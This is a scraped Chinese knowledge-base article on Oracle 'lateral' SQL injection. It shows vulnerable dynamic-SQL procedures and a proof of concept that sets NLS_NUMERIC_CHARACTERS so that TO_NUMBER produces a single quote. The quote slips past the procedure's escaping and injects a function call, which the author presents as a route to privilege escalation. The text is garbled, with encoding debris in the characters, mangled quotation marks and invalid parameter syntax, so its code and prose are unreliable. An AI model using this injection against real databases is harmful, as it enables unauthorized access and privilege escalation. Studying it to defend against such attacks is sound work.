主頁(yè) > 知識(shí)庫(kù) > ORACLE LATERAL-SQL-INJECTION 個(gè)人見(jiàn)解

ORACLE LATERAL-SQL-INJECTION 個(gè)人見(jiàn)解

熱門標(biāo)簽:語(yǔ)音電話機(jī)器人營(yíng)銷方案 語(yǔ)音電話機(jī)器人缺點(diǎn) 淮安自動(dòng)外呼系統(tǒng)開(kāi)發(fā) 地圖標(biāo)注原件 百變地圖標(biāo)注 修改高德地圖標(biāo)注 廣州市400電話辦理 南通防封外呼系統(tǒng)運(yùn)營(yíng)商 宜賓外呼系統(tǒng)廠家
如果直接執(zhí)行SQL語(yǔ)句或者參數(shù)綁定則不用擔(dān)心太多,
如以下ORACLE存儲(chǔ)過(guò)程
create or replace procedure kjdatepoc(date d)

as

begin

insert into kjdatetable values(d);

commit;

end;

根本不需要擔(dān)心遭受到SQL新型注入攻擊,那么在什么地方會(huì)發(fā)生DATE 以及 NUMBER的注入攻擊呢!?一般都是采用了動(dòng)態(tài)SQL而又不采用參數(shù)綁定的語(yǔ)句。

例如工程師經(jīng)常用的DBMS_SQL或者EXECUTE IMMEDIATE

看以下存儲(chǔ)過(guò)程

create or replace procedure kjdatepoc(date d)

as

begin

execute immediate ‘insert into kjdatetable values('|| d ||')';

commit;

end;

那么遇到以上的存儲(chǔ)過(guò)程或者函數(shù)等,也通過(guò)修改SESSION中的NLS_DATE_FORMAT中的值達(dá)到SQL注射的目的,

老外的PAPER講解得非常詳細(xì)了 ,我在這里也不廢話。

惟獨(dú)對(duì)于 NUMBER類型的注射沒(méi)有多作講解 只是簡(jiǎn)單演示了可以輸出單引號(hào)!

看以下語(yǔ)句

ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;

輸出一下結(jié)果

1000′10001

只是多了一個(gè)單引號(hào),那有什么用呢?樂(lè)觀的來(lái)說(shuō)!在特定情況下是很有價(jià)值的!看以下一個(gè)存儲(chǔ)過(guò)程

create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)

is

SecStr varchar2(1000);

begin

SecStr:=replace(kjexpstr,””,”””);

sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID='||kjexpnum||' and name=”'||SecStr||””);

end;

內(nèi)部對(duì)varchar類型進(jìn)行替換了!我們可以進(jìn)行測(cè)試

begin

numinjpoc(1000,”'–');

end;

其輸出SQL語(yǔ)句為

SELECT * FROM DUAL WHERE ID=1000 and name=”'–'

單引號(hào)被轉(zhuǎn)義掉了

那么如果我們結(jié)合這個(gè)NUMBER類型怎么進(jìn)行注射呢?

ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

begin

numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');

end;

看看輸出結(jié)果

SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()–'

這樣就可以間接的攻擊它…

在某中程度才來(lái)需要ALTER SESSION 配合后,再去攻擊系統(tǒng)內(nèi)部的一些函數(shù)或者過(guò)程來(lái)提升權(quán)限。未嘗不是一種好的突破思路,但是對(duì)于單語(yǔ)句進(jìn)行SQL注射攻擊,以結(jié)果為向?qū)У脑?!這樣的方式?jīng)]多大作為。

標(biāo)簽:池州 通化 襄陽(yáng) 股票投資 嘉峪關(guān) 南平 南平 聊城

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《ORACLE LATERAL-SQL-INJECTION 個(gè)人見(jiàn)解》,本文關(guān)鍵詞  ORACLE,LATERAL-SQL-INJECTION,個(gè)人,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《ORACLE LATERAL-SQL-INJECTION 個(gè)人見(jiàn)解》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于ORACLE LATERAL-SQL-INJECTION 個(gè)人見(jiàn)解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章